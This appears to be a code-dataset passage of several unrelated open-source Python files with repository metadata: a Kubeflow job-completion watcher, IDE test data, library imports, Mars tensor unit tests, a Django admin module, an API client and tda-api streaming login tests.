with open("/var/run/secrets/kubernetes.io/serviceaccount/namespace", mode='r') as file:
my_current_namespace = file.read()
if not my_current_namespace:
raise RuntimeError(f"error reading my current namespace {str(my_current_namespace)}")
v1 = client.CoreV1Api()
my_pod: V1Pod = v1.read_namespaced_pod(name=my_pod_name, namespace=my_current_namespace)
my_pod_metadata: V1ObjectMeta = my_pod.metadata
try:
my_tfjob_name = my_pod_metadata.owner_references[0].name
except IndexError:
raise RuntimeError("couldn't read my pod tf_job_key - no owner reference!")
if my_tfjob_name is None or my_tfjob_name == "":
raise RuntimeError("my_tfjob_name is not defined!")
coAPI = client.CustomObjectsApi()
log.info("initialization succeeded")
while True:
log.info(f"fetching tfjob: {my_tfjob_name} ...")
my_tfjob = coAPI.get_namespaced_custom_object(group="kubeflow.org",
version="v1alpha2",
namespace=my_current_namespace,
plural="tfjobs",
name=my_tfjob_name)
job_conditions = my_tfjob["status"]["conditions"]
for condition in job_conditions:
if condition.get("type") == JOB_SUCCESS_CONDITION:
log.info("Job succeeded, creating END hook")
open("/pod-data/END", 'a').close()
log.info("exiting...")
exit(0)
sleep(1)
| 33.138298 | 106 | 0.686998 |
a690c38c0d2fac4fa6dff75ea8eb73b1adb90108 | 155 | py | Python | python/testData/skeletons/BinaryStandardModule.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | ["Apache-2.0"] | 2 | 2018-12-29T09:53:39.000Z | 2018-12-29T09:53:42.000Z | python/testData/skeletons/BinaryStandardModule.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | ["Apache-2.0"] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/skeletons/BinaryStandardModule.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | ["Apache-2.0"] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z |
import binascii
import datetime
import <error descr="No module named nonexistent">nonexistent</error>
print(binascii)
print(datetime)
print(nonexistent)
| 17.222222 | 69 | 0.812903 |
842258234e0190fd4f026476b288e6d41f383ed1 | 239 | py | Python | ptrlib/util/__init__.py | alissonbezerra/ptrlib | 67a557acfa5069a66dd26670f53d94e63b023642 | ["MIT"] | 57 | 2019-12-08T00:02:14.000Z | 2022-03-24T20:40:40.000Z | ptrlib/util/__init__.py | alissonbezerra/ptrlib | 67a557acfa5069a66dd26670f53d94e63b023642 | ["MIT"] | 3 | 2020-01-26T03:38:31.000Z | 2020-06-21T13:42:46.000Z | ptrlib/util/__init__.py | alissonbezerra/ptrlib | 67a557acfa5069a66dd26670f53d94e63b023642 | ["MIT"] | 8 | 2020-04-20T08:17:57.000Z | 2021-10-04T06:04:51.000Z |
from ptrlib.util.encoding import *
from ptrlib.util.packing import *
from ptrlib.util.logic import *
from ptrlib.util.construct import *
from ptrlib.util.opebinary import *
from ptrlib.util.misc import *
from ptrlib.util.brutepwn import *
| 29.875 | 35 | 0.794979 |
77a84e501386cfba40c2c4443f895194e2e3f5ea | 6,725 | py | Python | mars/tensor/random/tests/test_random.py | tomzhang/mars-1 | 6f1d85e37eb1b383251314cb0ba13e06288af03d | ["Apache-2.0"] | 2 | 2019-03-29T04:11:10.000Z | 2020-07-08T10:19:54.000Z | mars/tensor/random/tests/test_random.py | tomzhang/mars-1 | 6f1d85e37eb1b383251314cb0ba13e06288af03d | ["Apache-2.0"] | null | null | null | mars/tensor/random/tests/test_random.py | tomzhang/mars-1 | 6f1d85e37eb1b383251314cb0ba13e06288af03d | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from mars.tensor.random import RandomState, beta, rand, choice, multivariate_normal, \
randint, randn, permutation, TensorPermutation, shuffle
from mars.tensor.datasource import tensor as from_ndarray
from mars.tests.core import TestBase
from mars.tiles import get_tiled
class Test(TestBase):
def testRandomSerialize(self):
arr = RandomState(0).beta([[2, 3]], from_ndarray([[4, 6], [5, 2]], chunk_size=2),
chunk_size=1, size=(3, 2, 2)).tiles()
chunk = arr.chunks[0]
self.assertEqual(chunk.op.dtype, np.dtype('f8'))
serials = self._pb_serial(chunk)
chunk2 = self._pb_deserial(serials)[chunk.data]
self.assertEqual(chunk.index, chunk2.index)
self.assertEqual(chunk.op.state, chunk2.op.state)
self.assertEqual(chunk.op.seed, chunk2.op.seed)
def testRandom(self):
arr = rand(2, 3)
self.assertIsNotNone(arr.dtype)
arr = beta(1, 2, chunk_size=2).tiles()
self.assertEqual(arr.shape, ())
self.assertEqual(len(arr.chunks), 1)
self.assertEqual(arr.chunks[0].shape, ())
self.assertEqual(arr.chunks[0].op.dtype, np.dtype('f8'))
arr = beta([1, 2], [3, 4], chunk_size=2).tiles()
self.assertEqual(arr.shape, (2,))
self.assertEqual(len(arr.chunks), 1)
self.assertEqual(arr.chunks[0].shape, (2,))
self.assertEqual(arr.chunks[0].op.dtype, np.dtype('f8'))
arr = beta([[2, 3]], from_ndarray([[4, 6], [5, 2]], chunk_size=2),
chunk_size=1, size=(3, 2, 2)).tiles()
self.assertEqual(arr.shape, (3, 2, 2))
self.assertEqual(len(arr.chunks), 12)
self.assertEqual(arr.chunks[0].op.dtype, np.dtype('f8'))
def testChoice(self):
t = choice(5, chunk_size=1)
self.assertEqual(t.shape, ())
t = t.tiles()
self.assertEqual(t.nsplits, ())
self.assertEqual(len(t.chunks), 1)
t = choice(5, 3, chunk_size=1)
self.assertEqual(t.shape, (3,))
t = t.tiles()
self.assertEqual(t.nsplits, ((1, 1, 1),))
t = choice(5, 3, replace=False)
self.assertEqual(t.shape, (3,))
with self.assertRaises(ValueError):
choice(-1)
# a should be 1-d
with self.assertRaises(ValueError):
choice(np.random.rand(2, 2))
# p sum != 1
with self.assertRaises(ValueError):
choice(np.random.rand(3), p=[0.2, 0.2, 0.2])
# p should b 1-d
with self.assertRaises(ValueError):
choice(np.random.rand(3), p=[[0.2, 0.6, 0.2]])
# replace=False, choice size cannot be greater than a.size
with self.assertRaises(ValueError):
choice(np.random.rand(10), 11, replace=False)
# replace=False, choice size cannot be greater than a.size
with self.assertRaises(ValueError):
choice(np.random.rand(10), (3, 4), replace=False)
def testMultivariateNormal(self):
mean = [0, 0]
cov = [[1, 0], [0, 100]]
t = multivariate_normal(mean, cov, 5000, chunk_size=500)
self.assertEqual(t.shape, (5000, 2))
self.assertEqual(t.op.size, (5000,))
t = t.tiles()
self.assertEqual(t.nsplits, ((500,) * 10, (2,)))
self.assertEqual(len(t.chunks), 10)
c = t.chunks[0]
self.assertEqual(c.shape, (500, 2))
self.assertEqual(c.op.size, (500,))
def testRandint(self):
arr = randint(1, 2, size=(10, 9), dtype='f8', density=.01, chunk_size=2).tiles()
self.assertEqual(arr.shape, (10, 9))
self.assertEqual(len(arr.chunks), 25)
self.assertEqual(arr.chunks[0].shape, (2, 2))
self.assertEqual(arr.chunks[0].op.dtype, np.float64)
self.assertEqual(arr.chunks[0].op.low, 1)
self.assertEqual(arr.chunks[0].op.high, 2)
self.assertEqual(arr.chunks[0].op.density, .01)
def testUnexpectedKey(self):
with self.assertRaises(ValueError):
rand(10, 10, chunks=5)
with self.assertRaises(ValueError):
randn(10, 10, chunks=5)
def testPermutation(self):
x = permutation(10)
self.assertEqual(x.shape, (10,))
self.assertIsInstance(x.op, TensorPermutation)
x = x.tiles()
self.assertEqual(len(x.chunks), 1)
self.assertIsInstance(x.chunks[0].op, TensorPermutation)
arr = from_ndarray([1, 4, 9, 12, 15], chunk_size=2)
x = permutation(arr)
self.assertEqual(x.shape, (5,))
self.assertIsInstance(x.op, TensorPermutation)
x = x.tiles()
arr = get_tiled(arr)
self.assertEqual(len(x.chunks), 3)
self.assertTrue(np.isnan(x.chunks[0].shape[0]))
self.assertIs(x.chunks[0].inputs[0].inputs[0].inputs[0], arr.chunks[0].data)
arr = rand(3, 3, chunk_size=2)
x = permutation(arr)
self.assertEqual(x.shape, (3, 3))
self.assertIsInstance(x.op, TensorPermutation)
x = x.tiles()
arr = get_tiled(arr)
self.assertEqual(len(x.chunks), 4)
self.assertTrue(np.isnan(x.chunks[0].shape[0]))
self.assertEqual(x.chunks[0].shape[1], 2)
self.assertIs(x.cix[0, 0].inputs[0].inputs[0].inputs[0], arr.cix[0, 0].data)
self.assertIs(x.cix[0, 0].inputs[0].inputs[1].inputs[0], arr.cix[1, 0].data)
self.assertEqual(x.cix[0, 0].op.seed, x.cix[0, 1].op.seed)
self.assertEqual(x.cix[0, 0].inputs[0].inputs[0].inputs[0].op.seed,
x.cix[1, 0].inputs[0].inputs[0].inputs[0].op.seed)
with self.assertRaises(np.AxisError):
self.assertRaises(permutation('abc'))
def testShuffle(self):
with self.assertRaises(TypeError):
shuffle('abc')
x = rand(10, 10, chunk_size=2)
shuffle(x)
self.assertIsInstance(x.op, TensorPermutation)
x = rand(10, 10, chunk_size=2)
shuffle(x, axis=1)
self.assertIsInstance(x.op, TensorPermutation)
self.assertEqual(x.op.axis, 1)
| 34.487179 | 89 | 0.603866 |
68fd0f32abe61ac99f1b2bfc403791712c028f2b | 1,300 | py | Python | files/admin.py | springborland/bk-sops | a9057672c10efb5f2414a805a30ead4092429c76 | ["Apache-2.0"] | 1 | 2021-05-19T04:31:34.000Z | 2021-05-19T04:31:34.000Z | files/admin.py | ZhuoZhuoCrayon/bk-sops | d1475d53c19729915727ce7adc24e3226f15e332 | ["Apache-2.0"] | null | null | null | files/admin.py | ZhuoZhuoCrayon/bk-sops | d1475d53c19729915727ce7adc24e3226f15e332 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from django.contrib import admin
from files import models
@admin.register(models.UploadModuleFileTag)
class UploadModuleFileTagAdmin(admin.ModelAdmin):
list_display = ["id", "source_ip", "file_name", "file_path"]
search_fields = ["id", "source_ip", "file_name", "file_path"]
@admin.register(models.UploadTicket)
class UploadTicketAdmin(admin.ModelAdmin):
list_display = ["id", "code", "applicant", "apply_from", "created_at", "is_available", "used_at"]
search_fields = ["id", "code", "applicant", "apply_from"]
list_filter = ["is_available"]
| 43.333333 | 115 | 0.758462 |
a0879e316536ea873328ca91a906c869dc356bda | 11,521 | py | Python | dkc_api/v1/objects/content/content.py | Blackgard/dkc-api | 9c221f4fdb862aacc404010d7708637b1a84b800 | ["MIT"] | 1 | 2022-03-09T06:09:59.000Z | 2022-03-09T06:09:59.000Z | dkc_api/v1/objects/content/content.py | Blackgard/dkc-api | 9c221f4fdb862aacc404010d7708637b1a84b800 | ["MIT"] | null | null | null | dkc_api/v1/objects/content/content.py | Blackgard/dkc-api | 9c221f4fdb862aacc404010d7708637b1a84b800 | ["MIT"] | null | null | null |
from __future__ import annotations
from typing import Union
from dkc_api.v1.const import URL_DOMAIN
from dkc_api.v1.models.error import ResponceError, ResponceErrorAlternative
from dkc_api.v1.exceptions.exceptions import NotValidVariables
from .models import GetRevisionLastSize, GetRevisionLast, GetRevisionDrawings, GetRevisionCertificates, GetRevisionMaterials, \
GetFile, PostFile, PostFileContent
import loguru
import requests
import datetime
from pydantic.error_wrappers import ValidationError
class Content:
""" Class for interacting with available operations for working with site news """
def __init__(self, access_token: str, headers: dict, debug: bool=False, logger: loguru.Logger = loguru.logger):
""" Class for interacting with available operations for working with site news """
self.access_token = access_token
self.headers = headers
self.logger = logger
self.debug = debug
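    # Illustrative usage sketch (the header value and sync flow are assumptions, not part
    # of this module):
    #   content = Content(access_token=token, headers={"Content-Type": "application/json"})
    #   size = content.getRevisionsLastSize(last_updated=datetime.datetime(2022, 1, 1))
    #   if not isinstance(size, ResponceError) and size.size > 0:
    #       revision = content.getRevisionsLast(last_updated=datetime.datetime(2022, 1, 1))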
def getRevisionsLastSize(self, last_updated: datetime.datetime=None) -> Union[GetRevisionLastSize, ResponceError]:
""" Get data about the size of the update in bytes. If 0 - there are no updates hour.
Args:
last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format.
Returns:
Union[GetRevisionLastSize, ResponceError]: Return revision last size.
Example:
>>> dkc_api.Content.getRevisionsLastSize()
> getRevisionsLastSize({"size": 67602981, "forced_update": false})
>>> dkc_api.Content.getRevisionsLastSize(last_updated=datetime.datetime.now())
> getRevisionsLastSize({"size": 0, "forced_update": false})
"""
send_last_updated = ""
if last_updated is not None and isinstance(last_updated, datetime.datetime):
send_last_updated = f"last_updated={int(last_updated.timestamp())}"
elif last_updated is not None and not isinstance(last_updated, datetime.datetime):
raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.")
if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}")
responce = requests.get(f"{URL_DOMAIN}/revisions/last/size?{send_last_updated}", headers=self.headers)
try: return GetRevisionLastSize(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() })
def getRevisionsLast(self, last_updated: datetime.datetime=None) -> Union[GetRevisionLast, ResponceError]:
""" An array containing a complete data upload or delta of changes, if the last_updated parameter is specified.
Args:
last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format.
Returns:
            Union[GetRevisionLast, ResponceError]: Return the latest revision data.
Example:
>>> dkc_api.Content.GetRevisionLast()
> GetRevisionLast(revision={delta=false, countries={updated=[{...}], removed=[{...}]}, ...})
"""
send_last_updated = ""
if last_updated is not None and isinstance(last_updated, datetime.datetime):
send_last_updated = f"last_updated={int(last_updated.timestamp())}"
elif last_updated is not None and not isinstance(last_updated, datetime.datetime):
raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.")
if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}")
responce = requests.get(f"{URL_DOMAIN}/revisions/last?{send_last_updated}", headers=self.headers)
try: return GetRevisionLast(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() })
def getRevisionDrawings(self, last_updated: datetime.datetime=None) -> Union[GetRevisionDrawings, ResponceError]:
""" An array containing the complete data upload or delta of changes, if the last_updated by drawings parameter is specified.
Args:
last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format.
Returns:
            Union[GetRevisionDrawings, ResponceError]: Return the drawings revision data.
Example:
>>> dkc_api.Content.GetRevisionDrawings()
> GetRevisionDrawings(revision={delta=false, countries={updated=[{...}], removed=[{...}]}, ...})
"""
send_last_updated = ""
if last_updated is not None and isinstance(last_updated, datetime.datetime):
send_last_updated = f"last_updated={int(last_updated.timestamp())}"
elif last_updated is not None and not isinstance(last_updated, datetime.datetime):
raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.")
if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}")
responce = requests.get(f"{URL_DOMAIN}/revisions/drawings?{send_last_updated}", headers=self.headers)
try: return GetRevisionDrawings(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() })
def getRevisionCertificates(self, last_updated: datetime.datetime=None) -> Union[GetRevisionCertificates, ResponceError]:
""" An array containing the complete data upload or delta of changes, if the last_updated by drawings parameter is specified.
Args:
last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format.
Returns:
            Union[GetRevisionCertificates, ResponceError]: Return the certificates revision data.
Example:
>>> dkc_api.Content.GetRevisionCertificates()
> GetRevisionCertificates(revision={delta=false, countries={updated=[{...}], removed=[{...}]}, ...})
"""
send_last_updated = ""
if last_updated is not None and isinstance(last_updated, datetime.datetime):
send_last_updated = f"last_updated={int(last_updated.timestamp())}"
elif last_updated is not None and not isinstance(last_updated, datetime.datetime):
raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.")
if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}")
responce = requests.get(f"{URL_DOMAIN}/revisions/certificates?{send_last_updated}", headers=self.headers)
try: return GetRevisionCertificates(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() })
def getRevisionMaterials(self, last_updated: datetime.datetime=None) -> Union[GetRevisionMaterials, ResponceError]:
""" An array containing the complete data upload or delta of changes, if the last_updated by drawings parameter is specified.
Args:
last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format.
Returns:
            Union[GetRevisionMaterials, ResponceError]: Return the materials revision data.
Example:
>>> dkc_api.Content.GetRevisionMaterials()
> GetRevisionMaterials(revision={delta=false, countries={updated=[{...}], removed=[{...}]}, ...})
"""
send_last_updated = ""
if last_updated is not None and isinstance(last_updated, datetime.datetime):
send_last_updated = f"last_updated={int(last_updated.timestamp())}"
elif last_updated is not None and not isinstance(last_updated, datetime.datetime):
raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.")
if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}")
responce = requests.get(f"{URL_DOMAIN}/revisions/materials?{send_last_updated}", headers=self.headers)
self.logger.debug(responce.json())
try: return GetRevisionMaterials(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() })
def getFile(self, file_id: int) -> Union[GetFile, ResponceError]:
""" Method for getting files via API
Args:
file_id (int): id file.
Returns:
Union[GetFile, ResponceError]: Return file name and content.
Example:
>>> dkc_api.Content.getFile(id=1)
> getFile({name="Спецификация.txt", content="MUAyODExMjAxOUBAMzYwNTA1QDEwQNCo0KJADQoyQDI4MTEyM..."})
"""
if not isinstance(file_id, int):
raise NotValidVariables(f"Variables id not valid int class. Getting {type(file_id)} class.")
responce = requests.get(f"{URL_DOMAIN}/file?id={file_id}", headers=self.headers)
try: return GetFile(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() })
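    # Round-trip sketch (illustrative; assumes the content field is base64-encoded, as the
    # docstring example suggests):
    #   file = content.getFile(file_id=1)
    #   with open(file.name, "wb") as fh:
    #       fh.write(base64.b64decode(file.content))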
def postFile(self, file_content: PostFileContent) -> Union[PostFile, ResponceError]:
""" Method for getting files via API
Args:
file_content (PostFileContent): file content.
Returns:
Union[PostFile, ResponceError]: Return file name id.
Example:
>>> dkc_api.Content.PostFile(PostFileContent={name="file_with_key.txt", value="8-khkjgj7hgJHGJHG97jhHKJ"})
> PostFile({id=889})
"""
if not isinstance(file_content, PostFileContent):
raise NotValidVariables(f"Variables file_content not valid PostFileContent class. Getting {type(file_content)} class.")
responce = requests.post(f"{URL_DOMAIN}/file", data=file_content.dict(), headers=self.headers)
try: return PostFile(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
            return ResponceError(**{"code": responce.status_code, **responce.json() })
| 49.659483 | 133 | 0.66522 |
aa264d637da4be6cdb018c2a4cc915b2e947af69 | 150,554 | py | Python | tests/streaming_test.py | r4m0n/tda-api | ceb2f15c0be0fd51e9c586cfe3604d97ba832e55 | ["MIT"] | null | null | null | tests/streaming_test.py | r4m0n/tda-api | ceb2f15c0be0fd51e9c586cfe3604d97ba832e55 | ["MIT"] | null | null | null | tests/streaming_test.py | r4m0n/tda-api | ceb2f15c0be0fd51e9c586cfe3604d97ba832e55 | ["MIT"] | null | null | null |
import tda
import urllib.parse
import json
import copy
from .utils import (account_principals, has_diff, MockResponse,
no_duplicates, AsyncMagicMock)
import asynctest
from unittest.mock import ANY, call, MagicMock, Mock
from tda import streaming
import asyncio
StreamClient = streaming.StreamClient
ACCOUNT_ID = 1000
TOKEN_TIMESTAMP = '2020-05-22T02:12:48+0000'
class StreamClientTest(asynctest.TestCase):
def setUp(self):
self.http_client = MagicMock()
self.client = StreamClient(self.http_client)
self.maxDiff = None
def account(self, index):
account = account_principals()['accounts'][0]
account['accountId'] = str(ACCOUNT_ID + index)
def parsable_as_int(s):
try:
int(s)
return True
except ValueError:
return False
for key, value in list(account.items()):
if isinstance(value, str) and not parsable_as_int(value):
account[key] = value + '-' + str(account['accountId'])
return account
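    # account() fabricates a principals entry whose string fields are suffixed with the
    # account id, so tests can tell multiple accounts apart in assertions.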
def stream_key(self, index):
return {'key': 'streamerSubscriptionKeys-keys-key' + str(index)}
def request_from_socket_mock(self, socket):
return json.loads(
socket.send.call_args_list[0][0][0])['requests'][0]
def success_response(self, request_id, service, command):
return {
'response': [
{
'service': service,
'requestid': str(request_id),
'command': command,
'timestamp': 1590116673258,
'content': {
'code': 0,
'msg': 'success'
}
}
]
}
def streaming_entry(self, service, command, content=None):
d = {
'data': [{
'service': service,
'command': command,
'timestamp': 1590186642440
}]
}
if content:
d['data'][0]['content'] = content
return d
def assert_handler_called_once_with(self, handler, expected):
handler.assert_called_once()
self.assertEqual(len(handler.call_args_list[0]), 2)
        data = handler.call_args_list[0][0][0]  # Mock on Python <= 3.7 has a limited call_args API
self.assertFalse(has_diff(data, expected))
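    # Helper that drives the full mocked login handshake so each test below can start
    # from an already-authenticated StreamClient with a reset socket mock.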
async def login_and_get_socket(self, ws_connect):
principals = account_principals()
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
socket.recv.side_effect = [json.dumps(self.success_response(
0, 'ADMIN', 'LOGIN'))]
await self.client.login()
socket.reset_mock()
return socket
##########################################################################
# Login
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_single_account_success(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
socket.recv.side_effect = [json.dumps(self.success_response(
0, 'ADMIN', 'LOGIN'))]
await self.client.login()
socket.send.assert_awaited_once()
request = self.request_from_socket_mock(socket)
creds = urllib.parse.parse_qs(request['parameters']['credential'])
self.assertEqual(creds['userid'], ['1001'])
self.assertEqual(creds['token'], ['streamerInfo-token'])
self.assertEqual(creds['company'], ['accounts-company-1001'])
self.assertEqual(
creds['cddomain'],
['accounts-accountCdDomainId-1001'])
self.assertEqual(creds['usergroup'], ['streamerInfo-userGroup'])
self.assertEqual(creds['accesslevel'], ['streamerInfo-accessLevel'])
self.assertEqual(creds['authorized'], ['Y'])
self.assertEqual(creds['timestamp'], ['1590113568000'])
self.assertEqual(creds['appid'], ['streamerInfo-appId'])
self.assertEqual(creds['acl'], ['streamerInfo-acl'])
self.assertEqual(request['parameters']['token'], 'streamerInfo-token')
self.assertEqual(request['parameters']['version'], '1.0')
self.assertEqual(request['requestid'], '0')
self.assertEqual(request['service'], 'ADMIN')
self.assertEqual(request['command'], 'LOGIN')
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_single_account_success_async(self, ws_connect):
'''
Same as test_login_single_account_success except the underlying client
is asynchronous and returns a coroutine for get_user_principals.
'''
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
async def get_user_principals(*args, **kwargs):
return MockResponse(principals, 200)
self.http_client.get_user_principals = get_user_principals
socket = AsyncMagicMock()
ws_connect.return_value = socket
socket.recv.side_effect = [json.dumps(self.success_response(
0, 'ADMIN', 'LOGIN'))]
await self.client.login()
socket.send.assert_awaited_once()
request = self.request_from_socket_mock(socket)
creds = urllib.parse.parse_qs(request['parameters']['credential'])
self.assertEqual(creds['userid'], ['1001'])
self.assertEqual(creds['token'], ['streamerInfo-token'])
self.assertEqual(creds['company'], ['accounts-company-1001'])
self.assertEqual(
creds['cddomain'],
['accounts-accountCdDomainId-1001'])
self.assertEqual(creds['usergroup'], ['streamerInfo-userGroup'])
self.assertEqual(creds['accesslevel'], ['streamerInfo-accessLevel'])
self.assertEqual(creds['authorized'], ['Y'])
self.assertEqual(creds['timestamp'], ['1590113568000'])
self.assertEqual(creds['appid'], ['streamerInfo-appId'])
self.assertEqual(creds['acl'], ['streamerInfo-acl'])
self.assertEqual(request['parameters']['token'], 'streamerInfo-token')
self.assertEqual(request['parameters']['version'], '1.0')
self.assertEqual(request['requestid'], '0')
self.assertEqual(request['service'], 'ADMIN')
self.assertEqual(request['command'], 'LOGIN')
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_multiple_accounts_require_account_id(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['accounts'].append(self.account(2))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(2))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
with self.assertRaisesRegex(ValueError,
'.*initialized with unspecified account_id.*'):
await self.client.login()
ws_connect.assert_not_called()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_multiple_accounts_with_account_id(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['accounts'].append(self.account(2))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(2))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
socket.recv.side_effect = [json.dumps(self.success_response(
0, 'ADMIN', 'LOGIN'))]
self.client = StreamClient(self.http_client, account_id=1002)
await self.client.login()
socket.send.assert_awaited_once()
request = self.request_from_socket_mock(socket)
creds = urllib.parse.parse_qs(request['parameters']['credential'])
self.assertEqual(creds['userid'], ['1002'])
self.assertEqual(creds['token'], ['streamerInfo-token'])
self.assertEqual(creds['company'], ['accounts-company-1002'])
self.assertEqual(
creds['cddomain'],
['accounts-accountCdDomainId-1002'])
self.assertEqual(creds['usergroup'], ['streamerInfo-userGroup'])
self.assertEqual(creds['accesslevel'], ['streamerInfo-accessLevel'])
self.assertEqual(creds['authorized'], ['Y'])
self.assertEqual(creds['timestamp'], ['1590113568000'])
self.assertEqual(creds['appid'], ['streamerInfo-appId'])
self.assertEqual(creds['acl'], ['streamerInfo-acl'])
self.assertEqual(request['parameters']['token'], 'streamerInfo-token')
self.assertEqual(request['parameters']['version'], '1.0')
self.assertEqual(request['requestid'], '0')
self.assertEqual(request['service'], 'ADMIN')
self.assertEqual(request['command'], 'LOGIN')
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_unrecognized_account_id(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['accounts'].append(self.account(2))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(2))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
self.client = StreamClient(self.http_client, account_id=999999)
with self.assertRaisesRegex(ValueError,
'.*no account found with account_id 999999.*'):
await self.client.login()
ws_connect.assert_not_called()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_bad_response(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
response = self.success_response(0, 'ADMIN', 'LOGIN')
response['response'][0]['content']['code'] = 21
response['response'][0]['content']['msg'] = 'failed for some reason'
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.login()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_no_ssl_context(self, ws_connect):
self.client = StreamClient(self.http_client)
self.http_client.get_user_principals.return_value = MockResponse(
account_principals(), 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
socket.recv.side_effect = [json.dumps(self.success_response(
0, 'ADMIN', 'LOGIN'))]
await self.client.login()
